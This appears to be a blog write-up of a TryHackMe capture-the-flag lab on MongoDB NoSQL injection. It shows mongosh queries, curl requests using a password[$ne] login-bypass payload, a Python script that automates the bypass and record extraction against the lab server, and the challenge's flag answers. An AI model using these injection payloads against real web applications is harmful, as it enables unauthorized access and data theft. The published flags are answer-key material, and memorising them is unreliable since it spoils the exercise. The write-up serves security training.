[Day 7] Web Exploitation: Migration Without Security
This task’s learning objective is NoSQL database, particularly MongoDB. Here’s a cheatsheet from MongoDB document itself that may make our life easier.
Personally I’m more used to SQL databases, especially PostgreSQL. But this concise passage’s summarized it intelligibly:
Similar to relational databases (such as MySQL and MSSQL), MongoDB consists of databases, tables, fields but with different names where
- Collections are similar to tables or views in MySQL and MSSQL.
- Documents are similar to rows or records in MySQL and MSSQL.
- Fields are similar to columns in MySQL and MSSQL.
Also, it is useful to briefly look at and compare the query operators between MongoDB and MySQL:
- $and equivalent to AND in MySQL
- $or equivalent to OR in MySQL
- $eq equivalent to = in MySQL
Before exploiting the NoSQL injection, there are MongoDB operators that we need to be familiar with that are heavily used in the injections, which are:
- $eq - matches records that equal to a certain value
- $ne - matches records that are not equal to a certain value
- $gt - matches records that are greater than a certain value.
- $where - matches records based on Javascript condition
- $exists - matches records that have a certain field
- $regex - matches records that satisfy certain regular expressions.
According to the task, let’s SSH into our box first:
$ ssh thm@10.10.156.199 -p 2222
thm@10.10.156.199's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-1059-aws x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Last login: Tue Dec 21 08:53:12 2021
thm@mongo-server:~$ mongosh
Current Mongosh Log ID: 61c1a96abf06cbd75fee1b76
Connecting to: mongodb://127.0.0.1:27017/?directConnection=true&serverSelectionTimeoutMS=2000
Using MongoDB: 5.0.3
Using Mongosh: 1.1.0
For mongosh info see: https://docs.mongodb.com/mongodb-shell/
------
The server generated these startup warnings when booting:
2021-12-21T08:39:28.330+00:00: Using the XFS filesystem is strongly recommended with the WiredTiger storage engine. See http://dochub.mongodb.org/core/prodnotes-filesystem
2021-12-21T08:39:50.170+00:00: Access control is not enabled for the database. Read and write access to data and configuration is unrestricted
------
Warning: Found ~/.mongorc.js, but not ~/.mongoshrc.js. ~/.mongorc.js will not be loaded.
You may want to copy or rename ~/.mongorc.js to ~/.mongoshrc.js.
test>
As you may have noticed, I used mongosh shell instead of mongo as the task suggested, since mongo shell will soon be deprecated and removed.
The next steps are quite obvious if you consult the documentation.
test> show dbs
admin 41 kB
config 36.9 kB
flagdb 41 kB
local 73.7 kB
See that flagdb database? Our first task is to simply query its data.
test> use flagdb
switched to db flagdb
flagdb> show collections
flagColl
flagdb> show tables
flagColl
flagdb> db.flagColl.find()
[
{
_id: ObjectId("618806af0afbc09bdf42bd6a"),
flag: 'THM{8814a5e6662a9763f7df23ee59d944f9}'
}
]
And that’s for our first task. Onto our second task - inject it.
Here’s how its web interface look like in a browser:
And if you take a look at DevTool while sending dummy username and password, you will understand what’s going on behind the scene:
In short, it sends a POST request in plaintext to /login. So I tried to do it in the command line:
$ curl -X POST -d "username=admin&password=admin" http://10.10.92.86/login
{"msg":"Bad Creds"}
$ curl -X POST -d "username=admin&password[$ne]=admin" http://10.10.92.86/login
{"msg":"Bad Creds"}
Oops, forgot to escape it.
$ curl -X POST -d "username=admin&password[\$ne]=admin" http://10.10.92.86/login
Found. Redirecting to /dashboard
It worked!
The rest of the task’s basically doing the same with [$ne] payload. Therefore, I automated it a bit with a Python script. Enjoy. :D
#!/usr/bin/env python3
import requests, re
location = input("Enter server's address (default to http://0.0.0.0/): ") or 'http://0.0.0.0/'
location = [location if location[-1] == '/' else location + '/'][0]
location = [location if location[0:4] == 'http' else 'http://' + location][0]
def login(session):
credentials = {'username': 'admin', 'password[$ne]': 'admin'}
response = session.post(location + 'login', data=credentials)
print("Logged in successfully")
def getFlag1(session):
response = session.get(location + 'flag')
epr = re.compile("(THM\{.+\})")
print("Your first flag is: {}".format(epr.search(response.text).group(0)))
def getFlag2(session):
params = {"username[$ne]": "lmao", "role": "guest"}
response = session.get(location + 'search', params=params)
epr = re.compile("(THM\{.+\})")
print("Your second flag is: {}".format(epr.search(response.text).group(0)))
def getFlag3(session):
params = {"username[$ne]": "lmao", "role[$ne]": "lmao"}
response = session.get(location + 'search', params=params)
epr = re.compile("(ID:[0-9a-z]*:mcskidy:[a-z]*)")
print("Your last flag is: {}".format(epr.search(response.text).group(0)))
def main():
session = requests.Session()
login(session)
getFlag1(session)
getFlag2(session)
getFlag3(session)
if __name__ == '__main__':
main()
… You can pretty much do the same with BurpSuite, even faster. However, Burp’ll eat up all RAM and halt this ancient laptop of mine, so no Burp for me. (;-;)
And that’s for today’s challenge!
Interact with the MongoDB server to find the flag. What is the flag? THM{8814a5e6662a9763f7df23ee59d944f9}
We discussed how to bypass login pages as an admin. Can you log into the application that Grinch Enterprise controls as admin and retrieve the flag? THM{b6b304f5d5834a4d089b570840b467a8}
Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag? THM{2ec099f2d602cc4968c5267970be1326}
Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record? ID:6184f516ef6da50433f100f4:mcskidy:admin
